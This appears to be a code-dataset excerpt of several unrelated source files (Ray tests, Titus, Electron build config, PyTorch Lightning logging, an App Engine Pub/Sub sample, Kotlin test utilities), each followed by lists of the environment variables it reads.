sys.platform == "win32", reason="runtime_env unsupported on Windows.")
def test_decorator_complex(shutdown_only):
ray.init(
job_config=ray.job_config.JobConfig(
runtime_env={"env_vars": {
"foo": "job"
}}))
@ray.remote
def env_from_job():
return os.environ.get("foo")
assert ray.get(env_from_job.remote()) == "job"
@ray.remote(runtime_env={"env_vars": {"foo": "task"}})
def f():
return os.environ.get("foo")
assert ray.get(f.remote()) == "task"
@ray.remote(runtime_env={"env_vars": {"foo": "actor"}})
class A:
def g(self):
return os.environ.get("foo")
a = A.remote()
assert ray.get(a.g.remote()) == "actor"
# Test that runtime_env can be overridden by specifying .options().
assert ray.get(
f.options(runtime_env={
"env_vars": {
"foo": "new"
}
}).remote()) == "new"
a = A.options(runtime_env={"env_vars": {"foo": "new2"}}).remote()
assert ray.get(a.g.remote()) == "new2"
def test_container_option_serialize():
runtime_env = {
"container": {
"image": "ray:latest",
"run_options": ["--name=test"]
}
}
job_config = ray.job_config.JobConfig(runtime_env=runtime_env)
job_config_serialized = job_config.serialize()
# job_config_serialized is JobConfig protobuf serialized string,
# job_config.runtime_env.raw_json has container_option info
# job_config.serialized_runtime_env also has container_option info
assert job_config_serialized.count(b"image") == 2
def test_working_dir_override_failure(shutdown_only):
ray.init()
@ray.remote(runtime_env={"working_dir": "."})
def f():
pass
with pytest.raises(NotImplementedError):
f.remote()
@ray.remote
def g():
pass
with pytest.raises(NotImplementedError):
g.options(runtime_env={"working_dir": "."}).remote()
@ray.remote(runtime_env={"working_dir": "."})
class A:
pass
with pytest.raises(NotImplementedError):
A.remote()
@ray.remote
class B:
pass
with pytest.raises(NotImplementedError):
B.options(runtime_env={"working_dir": "."}).remote()
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-sv", __file__]))
|
[] |
[] |
[
"USE_RAY_CLIENT",
"EXIT_AFTER_INIT",
"foo"
] |
[]
|
["USE_RAY_CLIENT", "EXIT_AFTER_INIT", "foo"]
|
python
| 3 | 0 | |
titus-common-ext/kube/src/test/java/com/netflix/titus/ext/kube/clustermembership/connector/transport/fabric8io/Fabric8IOKubeExternalResource.java
|
/*
* Copyright 2021 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.ext.kube.clustermembership.connector.transport.fabric8io;
import io.fabric8.kubernetes.client.Config;
import io.fabric8.kubernetes.client.ConfigBuilder;
import io.fabric8.kubernetes.client.DefaultKubernetesClient;
import io.fabric8.kubernetes.client.NamespacedKubernetesClient;
import org.junit.rules.ExternalResource;
public class Fabric8IOKubeExternalResource extends ExternalResource {
private NamespacedKubernetesClient client;
@Override
protected void before() {
String kubeServer = System.getenv("KUBE_API_SERVER_URL");
if (kubeServer == null) {
this.client = new DefaultKubernetesClient();
} else {
Config config = new ConfigBuilder()
.withMasterUrl(kubeServer)
.build();
this.client = new DefaultKubernetesClient(config);
}
}
@Override
protected void after() {
if (client != null) {
client.close();
}
}
public NamespacedKubernetesClient getClient() {
return client;
}
}
|
[
"\"KUBE_API_SERVER_URL\""
] |
[] |
[
"KUBE_API_SERVER_URL"
] |
[]
|
["KUBE_API_SERVER_URL"]
|
java
| 1 | 0 | |
script/lib/config.py
|
#!/usr/bin/env python
from __future__ import print_function
import errno
import os
import platform
import sys
# URL to the mips64el sysroot image.
MIPS64EL_SYSROOT_URL = 'https://github.com/electron' \
+ '/debian-sysroot-image-creator/releases/download' \
+ '/v0.5.0/debian_jessie_mips64-sysroot.tar.bz2'
# URL to the mips64el toolchain.
MIPS64EL_GCC = 'gcc-4.8.3-d197-n64-loongson'
MIPS64EL_GCC_URL = 'http://ftp.loongnix.org/toolchain/gcc/release/' \
+ MIPS64EL_GCC + '.tar.gz'
BASE_URL = os.getenv('LIBCHROMIUMCONTENT_MIRROR') or \
'https://s3.amazonaws.com/github-janky-artifacts/libchromiumcontent'
PLATFORM = {
'cygwin': 'win32',
'darwin': 'darwin',
'linux2': 'linux',
'win32': 'win32',
}[sys.platform]
verbose_mode = False
def get_platform_key():
if os.environ.has_key('MAS_BUILD'):
return 'mas'
else:
return PLATFORM
def get_target_arch():
arch = os.environ.get('TARGET_ARCH')
if arch is None:
return 'x64'
return arch
def get_env_var(name):
value = os.environ.get('ELECTRON_' + name, '')
if not value:
# TODO Remove ATOM_SHELL_* fallback values
value = os.environ.get('ATOM_SHELL_' + name, '')
if value:
print('Warning: Use $ELECTRON_' + name +
' instead of $ATOM_SHELL_' + name)
return value
def s3_config():
config = (get_env_var('S3_BUCKET'),
get_env_var('S3_ACCESS_KEY'),
get_env_var('S3_SECRET_KEY'))
message = ('Error: Please set the $ELECTRON_S3_BUCKET, '
'$ELECTRON_S3_ACCESS_KEY, and '
'$ELECTRON_S3_SECRET_KEY environment variables')
assert all(len(c) for c in config), message
return config
def enable_verbose_mode():
print('Running in verbose mode')
global verbose_mode
verbose_mode = True
def is_verbose_mode():
return verbose_mode
def get_zip_name(name, version, suffix=''):
arch = get_target_arch()
if arch == 'arm':
arch += 'v7l'
zip_name = '{0}-{1}-{2}-{3}'.format(name, version, get_platform_key(), arch)
if suffix:
zip_name += '-' + suffix
return zip_name + '.zip'
def build_env():
env = os.environ.copy()
if get_target_arch() == "mips64el":
SOURCE_ROOT = os.path.abspath(os.path.dirname(
os.path.dirname(os.path.dirname(__file__))))
VENDOR_DIR = os.path.join(SOURCE_ROOT, 'vendor')
gcc_dir = os.path.join(VENDOR_DIR, MIPS64EL_GCC)
ldlib_dirs = [
gcc_dir + '/usr/x86_64-unknown-linux-gnu/mips64el-redhat-linux/lib',
gcc_dir + '/usr/lib64',
gcc_dir + '/usr/mips64el-redhat-linux/lib64',
gcc_dir + '/usr/mips64el-redhat-linux/sysroot/lib64',
gcc_dir + '/usr/mips64el-redhat-linux/sysroot/usr/lib64',
]
env['LD_LIBRARY_PATH'] = os.pathsep.join(ldlib_dirs)
env['PATH'] = os.pathsep.join([gcc_dir + '/usr/bin', env['PATH']])
return env
|
[] |
[] |
[
"LIBCHROMIUMCONTENT_MIRROR",
"TARGET_ARCH",
"ATOM_SHELL_' + nam",
"ELECTRON_' + nam"
] |
[]
|
["LIBCHROMIUMCONTENT_MIRROR", "TARGET_ARCH", "ATOM_SHELL_' + nam", "ELECTRON_' + nam"]
|
python
| 4 | 0 | |
pytorch_lightning/trainer/connectors/logger_connector/logger_connector.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from copy import deepcopy
from pprint import pprint
from typing import Dict, Iterable, List, Optional, Union
import torch
from pytorch_lightning.core import memory
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.loggers import LoggerCollection, TensorBoardLogger
from pytorch_lightning.trainer.connectors.logger_connector.callback_hook_validator import CallbackHookNameValidator
from pytorch_lightning.trainer.connectors.logger_connector.epoch_result_store import EpochResultStore
from pytorch_lightning.trainer.connectors.logger_connector.metrics_holder import MetricsHolder
from pytorch_lightning.trainer.states import RunningStage, TrainerState
from pytorch_lightning.utilities import DeviceType
from pytorch_lightning.utilities.metrics import metrics_to_scalars
class LoggerConnector:
def __init__(self, trainer, log_gpu_memory: Optional[str] = None):
self.trainer = trainer
self.log_gpu_memory = log_gpu_memory
self._callback_metrics = MetricsHolder()
self._evaluation_callback_metrics = MetricsHolder(to_float=True)
self._logged_metrics = MetricsHolder()
self._progress_bar_metrics = MetricsHolder(to_float=True)
self.eval_loop_results = []
self._cached_results = {stage: EpochResultStore(trainer) for stage in RunningStage}
self._cached_results[None] = EpochResultStore(trainer)
self._callback_hook_validator = CallbackHookNameValidator()
@property
def callback_metrics(self) -> Dict:
return self.get_metrics("callback_metrics")
@callback_metrics.setter
def callback_metrics(self, callback_metrics: Dict) -> None:
self.set_metrics("callback_metrics", callback_metrics)
@property
def evaluation_callback_metrics(self) -> Dict:
return self.get_metrics("evaluation_callback_metrics")
@evaluation_callback_metrics.setter
def evaluation_callback_metrics(self, evaluation_callback_metrics: Dict) -> None:
self.set_metrics("evaluation_callback_metrics", evaluation_callback_metrics)
@property
def logged_metrics(self) -> Dict:
return self.get_metrics("logged_metrics")
@logged_metrics.setter
def logged_metrics(self, logged_metrics: Dict) -> None:
self.set_metrics("logged_metrics", logged_metrics)
@property
def progress_bar_metrics(self) -> Dict:
return self.get_metrics("progress_bar_metrics")
@progress_bar_metrics.setter
def progress_bar_metrics(self, progress_bar_metrics: Dict) -> None:
self.set_metrics("progress_bar_metrics", progress_bar_metrics)
@property
def cached_results(self) -> Union[EpochResultStore, None]:
return self._cached_results.get(self.trainer._running_stage)
def get_metrics(self, key: str) -> Dict:
metrics_holder: MetricsHolder = getattr(self, f"_{key}")
model = self.trainer.lightning_module
metrics_holder.convert(model.device if model is not None else None)
return metrics_holder.metrics
def set_metrics(self, key: str, val: Dict) -> None:
metrics_holder: MetricsHolder = getattr(self, f"_{key}")
metrics_holder.reset(val)
def reset(self) -> None:
self.cached_results.reset()
def check_logging_in_callbacks(self, hook_fx_name, on_step: bool = None, on_epoch: bool = None) -> None:
self._callback_hook_validator.check_logging_in_callbacks(
current_hook_fx_name=hook_fx_name, on_step=on_step, on_epoch=on_epoch
)
def on_evaluation_batch_start(self, batch, dataloader_idx, num_dataloaders):
model = self.trainer.lightning_module
# set dataloader_idx only if multiple ones
model._current_dataloader_idx = dataloader_idx if num_dataloaders > 1 else None
# track batch_size
self.cached_results._batch_size = Result.extract_batch_size(batch)
def on_train_split_start(self, split_idx: int, opt_idx: int, split_batch) -> None:
self.cached_results._split_idx = split_idx
self.cached_results._opt_idx = opt_idx
self.cached_results._batch_size = Result.extract_batch_size(split_batch)
def on_train_batch_end(self) -> None:
self.cached_results._split_idx = None
self.cached_results._opt_idx = None
self.cached_results._batch_size = None
def cache_logged_metrics(self):
self._cached_results[self.trainer._running_stage].cache_result()
def on_trainer_init(self, logger, flush_logs_every_n_steps: int, log_every_n_steps: int, move_metrics_to_cpu: bool):
# logging
self.configure_logger(logger)
self.trainer.flush_logs_every_n_steps = flush_logs_every_n_steps
self.trainer.log_every_n_steps = log_every_n_steps
self.trainer.move_metrics_to_cpu = move_metrics_to_cpu
self.trainer.split_idx = None
@property
def should_flush_logs(self):
should_flush = (self.trainer.global_step + 1) % self.trainer.flush_logs_every_n_steps == 0
return should_flush or self.trainer.should_stop
@property
def should_update_logs(self):
should_log_every_n_steps = (self.trainer.global_step + 1) % self.trainer.log_every_n_steps == 0
return should_log_every_n_steps or self.trainer.should_stop
def configure_logger(self, logger):
if logger is True:
version = os.environ.get('PL_EXP_VERSION', self.trainer.slurm_job_id)
# default logger
self.trainer.logger = TensorBoardLogger(
save_dir=self.trainer.default_root_dir, version=version, name='lightning_logs'
)
elif logger is False:
self.trainer.logger = None
else:
if isinstance(logger, Iterable):
self.trainer.logger = LoggerCollection(logger)
else:
self.trainer.logger = logger
def cache_training_step_metrics(self, opt_closure_result):
"""
This function is responsible to update
logger_connector internals metrics holder based for depreceated logging
"""
using_results_obj = isinstance(opt_closure_result.training_step_output, Result)
# temporary dict to collect metrics
logged_metrics_tmp = {}
pbar_metrics_tmp = {}
callback_metrics_tmp = {}
if using_results_obj:
batch_log_metrics = opt_closure_result.training_step_output.get_batch_log_metrics(
include_forked_originals=False
)
logged_metrics_tmp.update(batch_log_metrics)
batch_pbar_metrics = opt_closure_result.training_step_output.get_batch_pbar_metrics(
include_forked_originals=False
)
pbar_metrics_tmp.update(batch_pbar_metrics)
forked_metrics = opt_closure_result.training_step_output.get_forked_metrics()
callback_metrics_tmp.update(forked_metrics)
callback_metrics_tmp.update(logged_metrics_tmp)
else:
batch_log_metrics = opt_closure_result.training_step_output.log_metrics
logged_metrics_tmp.update(batch_log_metrics)
batch_pbar_metrics = opt_closure_result.training_step_output.pbar_on_batch_end
pbar_metrics_tmp.update(batch_pbar_metrics)
# track progress bar metrics
if len(pbar_metrics_tmp) > 0:
self.add_progress_bar_metrics(pbar_metrics_tmp)
self._callback_metrics.update(callback_metrics_tmp)
self._logged_metrics.update(logged_metrics_tmp)
def log_metrics(self, metrics, grad_norm_dic, step=None):
"""Logs the metric dict passed in.
If `step` parameter is None and `step` key is presented is metrics,
uses metrics["step"] as a step
Args:
metrics (dict): Metric values
grad_norm_dic (dict): Gradient norms
step (int): Step for which metrics should be logged. Default value corresponds to `self.global_step`
"""
# add gpu memory
if self.trainer._device_type == DeviceType.GPU and self.log_gpu_memory:
mem_map = memory.get_memory_profile(self.log_gpu_memory)
metrics.update(mem_map)
# add norms
metrics.update(grad_norm_dic)
# turn all tensors to scalars
scalar_metrics = metrics_to_scalars(metrics)
if "step" in scalar_metrics and step is None:
step = scalar_metrics.pop("step")
elif step is None:
# added metrics by Lightning for convenience
scalar_metrics['epoch'] = self.trainer.current_epoch
step = self.trainer.global_step
# log actual metrics
if self.trainer.logger is not None:
if self.trainer.is_global_zero:
self.trainer.logger.agg_and_log_metrics(scalar_metrics, step=step)
self.trainer.logger.save()
# track the logged metrics
self.logged_metrics.update(scalar_metrics)
self.trainer.dev_debugger.track_logged_metrics_history(scalar_metrics)
def add_progress_bar_metrics(self, metrics):
for k, v in metrics.items():
if isinstance(v, torch.Tensor):
v = v.item()
self._progress_bar_metrics.metrics[k] = v
self.trainer.dev_debugger.track_pbar_metrics_history(metrics)
def evaluation_epoch_end(self):
# reset dataloader idx
model_ref = self.trainer.lightning_module
model_ref._current_dataloader_idx = None
# setting `has_batch_loop_finished` to True
# will perform Results reduction accross entire epoch.
self.cached_results.has_batch_loop_finished = True
def add_to_eval_loop_results(self, dl_idx, has_been_initialized):
callback_metrics = deepcopy(self.evaluation_callback_metrics)
for key in list(callback_metrics.keys()):
if "dataloader_idx" in key:
if f"dataloader_idx_{dl_idx}" not in key:
# remove dl_idx from self.callback_metrics not belonging to this dataset.
del callback_metrics[key]
if has_been_initialized:
self.eval_loop_results[dl_idx].update(callback_metrics)
else:
self.eval_loop_results.append(callback_metrics)
def prepare_eval_loop_results(self):
num_dataloaders = self.trainer.evaluation_loop.num_dataloaders
has_been_initialized = len(self.eval_loop_results) == num_dataloaders
for dl_idx in range(self.trainer.evaluation_loop.num_dataloaders):
self.add_to_eval_loop_results(dl_idx, has_been_initialized)
def get_evaluate_epoch_results(self):
if not self.trainer.sanity_checking:
# log all the metrics as a single dict
metrics_to_log = self.cached_results.get_epoch_log_metrics()
if len(metrics_to_log) > 0:
self.log_metrics(metrics_to_log, {})
self.prepare_eval_loop_results()
# log results of evaluation
if (
self.trainer.state != TrainerState.FITTING and self.trainer.evaluating and self.trainer.is_global_zero
and self.trainer.verbose_evaluate
):
print('-' * 80)
for result_idx, results in enumerate(self.eval_loop_results):
print(f'DATALOADER:{result_idx} {self.trainer._running_stage.upper()} RESULTS')
pprint({
k: (v.item() if v.numel() == 1 else v.tolist()) if isinstance(v, torch.Tensor) else v
for k, v in results.items()
})
print('-' * 80)
results = self.eval_loop_results
# clear mem
self.eval_loop_results = []
return results
def on_train_epoch_end(self):
# inform cached logger connector epoch finished
self.cached_results.has_batch_loop_finished = True
def log_train_epoch_end_metrics(self, epoch_output: List[List[List[Result]]]) -> None:
# epoch output is a list. Each item in that list has all the outputs per optimizer
# epoch_output[optimizer_idx][training_step_idx][tbptt_index]
# remember that not using truncated backprop is equivalent with truncated back prop of len(1)
# log/aggregate metrics automatically
epoch_log_metrics, epoch_progress_bar_metrics = self.__auto_reduce_results_on_epoch_end(epoch_output)
# it will perform reduction over epoch and return log metrics
cached_epoch_log_metrics = self.cached_results.get_epoch_log_metrics()
cached_epoch_pbar_metrics = self.cached_results.get_epoch_pbar_metrics()
# update
epoch_log_metrics.update(cached_epoch_log_metrics)
epoch_progress_bar_metrics.update(cached_epoch_pbar_metrics)
# --------------------------
# track results
# --------------------------
# add the metrics to the loggers and callbacks
if epoch_log_metrics and len(epoch_log_metrics) > 0:
self.log_metrics(epoch_log_metrics, {})
self._callback_metrics.update(epoch_log_metrics)
# add metrics to progress_bar and callbacks
if len(epoch_progress_bar_metrics) > 0:
self.add_progress_bar_metrics(epoch_progress_bar_metrics)
self._callback_metrics.update(epoch_progress_bar_metrics)
# reset epoch loop result for next epoch
self.cached_results.reset()
def __auto_reduce_results_on_epoch_end(self, epoch_output):
epoch_log_metrics = {}
epoch_progress_bar_metrics = {}
for opt_outputs in epoch_output:
# reduce across time first
time_reduced_outputs = []
for tbptt_outs in opt_outputs:
tbptt_outs = tbptt_outs[0].__class__.reduce_across_time(tbptt_outs)
if len(tbptt_outs) > 1:
time_reduced_outputs.append(tbptt_outs)
if len(time_reduced_outputs) == 0:
continue
# reduce across training steps
opt_outputs = time_reduced_outputs[0].__class__.reduce_on_epoch_end(time_reduced_outputs)
# with manual opt need 1 + metrics because meta is always there
if opt_outputs.minimize is not None:
opt_outputs.minimize = opt_outputs.minimize.mean()
epoch_log_metrics.update(opt_outputs.epoch_log_metrics)
epoch_progress_bar_metrics.update(opt_outputs.epoch_pbar_metrics)
return epoch_log_metrics, epoch_progress_bar_metrics
def log_train_step_metrics(self, batch_output):
if self.trainer.train_loop.should_accumulate() and self.trainer.lightning_module.automatic_optimization:
return
_, batch_log_metrics = self.cached_results.update_logger_connector()
# when metrics should be logged
if self.should_update_logs or self.trainer.fast_dev_run is True:
# logs user requested information to logger
grad_norm_dic = batch_output.grad_norm_dic
if grad_norm_dic is None:
grad_norm_dic = {}
if len(batch_log_metrics) > 0 or len(grad_norm_dic) > 0:
self.log_metrics(batch_log_metrics, grad_norm_dic)
self._callback_metrics.update(batch_log_metrics)
|
[] |
[] |
[
"PL_EXP_VERSION"
] |
[]
|
["PL_EXP_VERSION"]
|
python
| 1 | 0 | |
appengine/flexible/pubsub/main.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START app]
import base64
import json
import logging
import os
from flask import current_app, Flask, render_template, request
from gcloud import pubsub
app = Flask(__name__)
# Configure the following environment variables via app.yaml
# This is used in the push request handler to veirfy that the request came from
# pubsub and originated from a trusted source.
app.config['PUBSUB_VERIFICATION_TOKEN'] = \
os.environ['PUBSUB_VERIFICATION_TOKEN']
app.config['PUBSUB_TOPIC'] = os.environ['PUBSUB_TOPIC']
# Global list to storage messages received by this instance.
MESSAGES = []
# [START index]
@app.route('/', methods=['GET', 'POST'])
def index():
if request.method == 'GET':
return render_template('index.html', messages=MESSAGES)
ps = pubsub.Client()
topic = ps.topic(current_app.config['PUBSUB_TOPIC'])
topic.publish(
request.form.get('payload', 'Example payload').encode('utf-8'))
return 'OK', 200
# [END index]
# [START push]
@app.route('/pubsub/push', methods=['POST'])
def pubsub_push():
if (request.args.get('token', '') !=
current_app.config['PUBSUB_VERIFICATION_TOKEN']):
return 'Invalid request', 400
envelope = json.loads(request.data.decode('utf-8'))
payload = base64.b64decode(envelope['message']['data'])
MESSAGES.append(payload)
# Returning any 2xx status indicates successful receipt of the message.
return 'OK', 200
# [END push]
@app.errorhandler(500)
def server_error(e):
logging.exception('An error occurred during a request.')
return """
An internal error occurred: <pre>{}</pre>
See logs for full stacktrace.
""".format(e), 500
if __name__ == '__main__':
# This is used when running locally. Gunicorn is used to run the
# application on Google App Engine. See entrypoint in app.yaml.
app.run(host='127.0.0.1', port=8080, debug=True)
# [END app]
|
[] |
[] |
[
"PUBSUB_VERIFICATION_TOKEN",
"PUBSUB_TOPIC"
] |
[]
|
["PUBSUB_VERIFICATION_TOKEN", "PUBSUB_TOPIC"]
|
python
| 2 | 0 | |
compiler/tests-common/tests/org/jetbrains/kotlin/test/KotlinTestUtils.java
|
/*
* Copyright 2010-2019 JetBrains s.r.o. and Kotlin Programming Language contributors.
* Use of this source code is governed by the Apache 2.0 license that can be found in the license/LICENSE.txt file.
*/
package org.jetbrains.kotlin.test;
import com.google.common.collect.Lists;
import com.intellij.openapi.Disposable;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.util.SystemInfo;
import com.intellij.openapi.util.io.FileUtil;
import com.intellij.openapi.util.text.StringUtil;
import com.intellij.openapi.vfs.CharsetToolkit;
import com.intellij.psi.PsiElement;
import com.intellij.rt.execution.junit.FileComparisonFailure;
import com.intellij.testFramework.TestDataFile;
import junit.framework.TestCase;
import kotlin.Unit;
import kotlin.collections.CollectionsKt;
import kotlin.jvm.functions.Function0;
import kotlin.jvm.functions.Function1;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import org.jetbrains.kotlin.analyzer.AnalysisResult;
import org.jetbrains.kotlin.builtins.DefaultBuiltIns;
import org.jetbrains.kotlin.builtins.KotlinBuiltIns;
import org.jetbrains.kotlin.checkers.CompilerTestLanguageVersionSettingsKt;
import org.jetbrains.kotlin.cli.common.CLIConfigurationKeys;
import org.jetbrains.kotlin.cli.common.config.ContentRootsKt;
import org.jetbrains.kotlin.cli.common.config.KotlinSourceRoot;
import org.jetbrains.kotlin.cli.common.messages.CompilerMessageSeverity;
import org.jetbrains.kotlin.cli.common.messages.CompilerMessageSourceLocation;
import org.jetbrains.kotlin.cli.common.messages.MessageCollector;
import org.jetbrains.kotlin.cli.jvm.compiler.EnvironmentConfigFiles;
import org.jetbrains.kotlin.cli.jvm.compiler.KotlinCoreEnvironment;
import org.jetbrains.kotlin.cli.jvm.config.JvmContentRootsKt;
import org.jetbrains.kotlin.codegen.forTestCompile.ForTestCompileRuntime;
import org.jetbrains.kotlin.config.CommonConfigurationKeys;
import org.jetbrains.kotlin.config.CompilerConfiguration;
import org.jetbrains.kotlin.config.JVMConfigurationKeys;
import org.jetbrains.kotlin.descriptors.impl.ModuleDescriptorImpl;
import org.jetbrains.kotlin.jvm.compiler.LoadDescriptorUtil;
import org.jetbrains.kotlin.lexer.KtTokens;
import org.jetbrains.kotlin.name.Name;
import org.jetbrains.kotlin.psi.KtFile;
import org.jetbrains.kotlin.psi.KtPsiFactoryKt;
import org.jetbrains.kotlin.resolve.lazy.JvmResolveUtil;
import org.jetbrains.kotlin.storage.LockBasedStorageManager;
import org.jetbrains.kotlin.test.testFramework.KtUsefulTestCase;
import org.jetbrains.kotlin.test.util.JUnit4Assertions;
import org.jetbrains.kotlin.test.util.KtTestUtil;
import org.jetbrains.kotlin.test.util.StringUtilsKt;
import org.jetbrains.kotlin.utils.ExceptionUtilsKt;
import org.junit.Assert;
import java.io.File;
import java.io.IOException;
import java.lang.annotation.Annotation;
import java.lang.reflect.Method;
import java.nio.file.Path;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import static org.jetbrains.kotlin.test.InTextDirectivesUtils.IGNORE_BACKEND_DIRECTIVE_PREFIX;
import static org.jetbrains.kotlin.test.InTextDirectivesUtils.isIgnoredTarget;
public class KotlinTestUtils {
public static String TEST_MODULE_NAME = "test-module";
public static final String TEST_GENERATOR_NAME = "org.jetbrains.kotlin.generators.tests.TestsPackage";
private static final boolean RUN_IGNORED_TESTS_AS_REGULAR =
Boolean.getBoolean("org.jetbrains.kotlin.run.ignored.tests.as.regular");
private static final boolean PRINT_STACKTRACE_FOR_IGNORED_TESTS =
Boolean.getBoolean("org.jetbrains.kotlin.print.stacktrace.for.ignored.tests");
private static final boolean DONT_IGNORE_TESTS_WORKING_ON_COMPATIBLE_BACKEND =
Boolean.getBoolean("org.jetbrains.kotlin.dont.ignore.tests.working.on.compatible.backend");
private static final boolean AUTOMATICALLY_UNMUTE_PASSED_TESTS = false;
private static final boolean AUTOMATICALLY_MUTE_FAILED_TESTS = false;
private static final Pattern DIRECTIVE_PATTERN = Pattern.compile("^//\\s*[!]?([A-Z_]+)(:[ \\t]*(.*))?$", Pattern.MULTILINE);
private KotlinTestUtils() {
}
@NotNull
public static AnalysisResult analyzeFile(@NotNull KtFile file, @NotNull KotlinCoreEnvironment environment) {
return JvmResolveUtil.analyze(file, environment);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithMockJdkAndIdeaAnnotations(Disposable disposable) {
return createEnvironmentWithMockJdkAndIdeaAnnotations(disposable, ConfigurationKind.ALL);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithMockJdkAndIdeaAnnotations(Disposable disposable, @NotNull ConfigurationKind configurationKind) {
return createEnvironmentWithJdkAndNullabilityAnnotationsFromIdea(disposable, configurationKind, TestJdkKind.MOCK_JDK);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithJdkAndNullabilityAnnotationsFromIdea(
@NotNull Disposable disposable,
@NotNull ConfigurationKind configurationKind,
@NotNull TestJdkKind jdkKind
) {
return KotlinCoreEnvironment.createForTests(
disposable, newConfiguration(configurationKind, jdkKind, KtTestUtil.getAnnotationsJar()), EnvironmentConfigFiles.JVM_CONFIG_FILES
);
}
@NotNull
public static KotlinCoreEnvironment createEnvironmentWithFullJdkAndIdeaAnnotations(Disposable disposable) {
return createEnvironmentWithJdkAndNullabilityAnnotationsFromIdea(disposable, ConfigurationKind.ALL, TestJdkKind.FULL_JDK);
}
@NotNull
public static File tmpDirForTest(TestCase test) throws IOException {
return KtTestUtil.tmpDirForTest(test.getClass().getSimpleName(), test.getName());
}
@NotNull
public static CompilerConfiguration newConfiguration() {
CompilerConfiguration configuration = new CompilerConfiguration();
configuration.put(CommonConfigurationKeys.MODULE_NAME, TEST_MODULE_NAME);
configuration.put(CLIConfigurationKeys.MESSAGE_COLLECTOR_KEY, new MessageCollector() {
@Override
public void clear() {
}
@Override
public void report(
@NotNull CompilerMessageSeverity severity, @NotNull String message, @Nullable CompilerMessageSourceLocation location
) {
if (severity == CompilerMessageSeverity.ERROR) {
String prefix = location == null
? ""
: "(" + location.getPath() + ":" + location.getLine() + ":" + location.getColumn() + ") ";
throw new AssertionError(prefix + message);
}
}
@Override
public boolean hasErrors() {
return false;
}
});
return configuration;
}
@NotNull
public static CompilerConfiguration newConfiguration(
@NotNull ConfigurationKind configurationKind,
@NotNull TestJdkKind jdkKind,
@NotNull File... extraClasspath
) {
return newConfiguration(configurationKind, jdkKind, Arrays.asList(extraClasspath), Collections.emptyList());
}
@NotNull
public static CompilerConfiguration newConfiguration(
@NotNull ConfigurationKind configurationKind,
@NotNull TestJdkKind jdkKind,
@NotNull List<File> classpath,
@NotNull List<File> javaSource
) {
CompilerConfiguration configuration = newConfiguration();
JvmContentRootsKt.addJavaSourceRoots(configuration, javaSource);
if (jdkKind == TestJdkKind.MOCK_JDK) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, KtTestUtil.findMockJdkRtJar());
configuration.put(JVMConfigurationKeys.NO_JDK, true);
}
else if (jdkKind == TestJdkKind.MODIFIED_MOCK_JDK) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, KtTestUtil.findMockJdkRtModified());
configuration.put(JVMConfigurationKeys.NO_JDK, true);
}
else if (jdkKind == TestJdkKind.ANDROID_API) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, KtTestUtil.findAndroidApiJar());
configuration.put(JVMConfigurationKeys.NO_JDK, true);
}
else if (jdkKind == TestJdkKind.FULL_JDK_6) {
String jdk6 = System.getenv("JDK_16");
assert jdk6 != null : "Environment variable JDK_16 is not set";
configuration.put(JVMConfigurationKeys.JDK_HOME, new File(jdk6));
}
else if (jdkKind == TestJdkKind.FULL_JDK_9) {
configuration.put(JVMConfigurationKeys.JDK_HOME, KtTestUtil.getJdk9Home());
}
else if (jdkKind == TestJdkKind.FULL_JDK_15) {
configuration.put(JVMConfigurationKeys.JDK_HOME, KtTestUtil.getJdk15Home());
}
else if (SystemInfo.IS_AT_LEAST_JAVA9) {
configuration.put(JVMConfigurationKeys.JDK_HOME, new File(System.getProperty("java.home")));
}
if (configurationKind.getWithRuntime()) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.runtimeJarForTests());
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.scriptRuntimeJarForTests());
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.kotlinTestJarForTests());
}
else if (configurationKind.getWithMockRuntime()) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.minimalRuntimeJarForTests());
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.scriptRuntimeJarForTests());
}
if (configurationKind.getWithReflection()) {
JvmContentRootsKt.addJvmClasspathRoot(configuration, ForTestCompileRuntime.reflectJarForTests());
}
JvmContentRootsKt.addJvmClasspathRoots(configuration, classpath);
return configuration;
}
public static void resolveAllKotlinFiles(KotlinCoreEnvironment environment) throws IOException {
List<KotlinSourceRoot> roots = ContentRootsKt.getKotlinSourceRoots(environment.getConfiguration());
if (roots.isEmpty()) return;
List<KtFile> ktFiles = new ArrayList<>();
for (KotlinSourceRoot root : roots) {
File file = new File(root.getPath());
if (file.isFile()) {
ktFiles.add(loadJetFile(environment.getProject(), file));
}
else {
